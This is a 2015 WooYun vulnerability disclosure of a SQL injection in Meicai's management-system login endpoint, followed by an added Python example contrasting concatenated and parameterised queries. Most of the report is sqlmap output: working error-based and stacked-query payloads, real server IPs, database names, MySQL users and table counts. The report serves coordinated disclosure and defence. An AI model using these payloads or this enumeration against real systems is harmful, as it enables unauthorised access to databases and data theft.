Vulnerability summary

Defect ID: wooyun-2015-0116582

Title: SQL injection in the Meicai core system

Vendor: meicai.cn

Author: 爱上平顶山

Submitted: 2015-05-27 22:21

Fixed: 2015-07-12 13:10

Published: 2015-07-12 13:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-27: details sent to the vendor, awaiting vendor action
2015-05-28: vendor confirmed; details visible to the vendor only
2015-06-07: details opened to core white hats and domain experts
2015-06-17: details opened to regular white hats
2015-06-27: details opened to intern white hats
2015-07-12: details opened to the public

Brief description:

Heh.

Details:

Meicai core system

http://119.90.53.100/   Meicai management system
http://119.90.53.180/   Meicai management system


Both of these. On the login check endpoint
http://119.90.53.100/default/checklogin
the username parameter is injectable via POST:

sqlmap identified the following injection points with a total of 435 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
available databases [6]:
[*] Commodity
[*] information_schema
[*] mysql
[*] performance_schema
[*] tt
[*] wms_test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: password=8&securityCode=4&username=' AND (SELECT 2973 FROM(SELECT COUNT(*),CONCAT(0x7166747171,(SELECT (CASE WHEN (2973=2973) THEN 1 ELSE 0 END)),0x716b626371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXse'='xXse
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: password=8&securityCode=4&username='; SELECT SLEEP(5)--
Vector: ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])--
---
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL 5.0
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'yssstp'@'%'
Database: wms_test
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| t_admin_user_power | 3876 |
| t_product_category | 3345 |
| t_product | 2654 |
| t_product_set | 2654 |
| t_stock_log | 1595 |
| t_cargo_space | 1190 |
| t_shop | 702 |
| t_admin_group_power | 438 |
| t_admin_user_log | 399 |
| t_order_log | 255 |
| t_order_product | 167 |
| t_cargospace_log | 146 |
| t_supplier_purchase_product | 76 |
| t_supplier_appointment | 54 |
| t_order | 52 |
| t_supplier_purchase | 52 |
| t_stock | 47 |
| t_supplier | 44 |
| t_supplier_warehouse | 44 |
| t_pallet | 37 |
| t_product_added | 28 |
| t_product_receipt | 27 |
| t_warehouse | 25 |
| t_admin_user_warehouse | 21 |
| t_admin_user_process | 15 |
| t_process_order | 15 |
| t_admin_user | 13 |
| t_process_product | 12 |
| t_message | 11 |
| t_warehouse_aisle | 10 |
| t_order_wave | 9 |
| t_process_product_detail | 9 |
| t_warehouse_area | 9 |
| t_stock_lock_log | 7 |
| t_cargospace_transfer | 5 |
| t_process | 4 |
| t_admin_group | 3 |
| t_cargoowner_warehouse | 3 |
| t_return | 3 |
| t_return_product | 3 |
| t_cargoowner | 2 |
| t_order_deliver | 2 |
| t_order_deliver_detail | 2 |
| t_order_wave_detail | 2 |
| t_product_defective | 2 |
| t_app | 1 |
| t_app_cargoowner | 1 |
| t_cargospace_freeze | 1 |
| t_cargospace_freeze_list | 1 |
| t_inventory | 1 |
| t_order_box | 1 |
+-----------------------------+---------+


OK, not going any deeper; that's it.

Proof of vulnerability:

···

Fix recommendation:

···
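The report leaves the fix section empty. As an added example (not part of the original report and not Meicai's code), the Python stand-in below for the checklogin handler shows the string-built query that the error-based finding depends on beside a parameterised version. Only the table name t_admin_user comes from the report's table list; the columns, sample row and in-memory sqlite3 database standing in for MySQL are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the admin table (columns assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_admin_user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO t_admin_user VALUES ('alice', 'secret')")
    return conn


def checklogin_vulnerable(conn, username, password):
    """Concatenates the POST fields into the SQL text. This is the pattern the
    report's error-based finding relies on: a quote in `username` closes the
    string literal and whatever follows is parsed as SQL, and the resulting
    database error is what sqlmap reads its answers out of."""
    sql = ("SELECT COUNT(*) FROM t_admin_user WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] == 1


def checklogin_fixed(conn, username, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input is only data. In PHP/MySQL the equivalent is a PDO or
    mysqli prepared statement; also keep multi-statement execution disabled so
    stacked queries like the report's '; SELECT SLEEP(5)-- cannot run."""
    sql = "SELECT COUNT(*) FROM t_admin_user WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] == 1


def outcome(check, username, password):
    """Run one login check on a fresh DB and return 'ok', 'denied', or the
    database error text that a string-built query leaks to the caller."""
    conn = make_db()
    try:
        return "ok" if check(conn, username, password) else "denied"
    except sqlite3.Error as exc:
        return "error: " + str(exc)


if __name__ == "__main__":
    # A legitimate name containing an apostrophe is enough to break the
    # concatenated query; the parameterised one simply reports no match.
    for name in ("alice", "o'reilly"):
        print(name, "->", outcome(checklogin_vulnerable, name, "secret"),
              "|", outcome(checklogin_fixed, name, "secret"))
```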

Copyright notice: please credit the source when reposting: 爱上平顶山@乌云


Vulnerability responses

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-05-28 13:08

Vendor reply:

Thanks.

Latest status:

None yet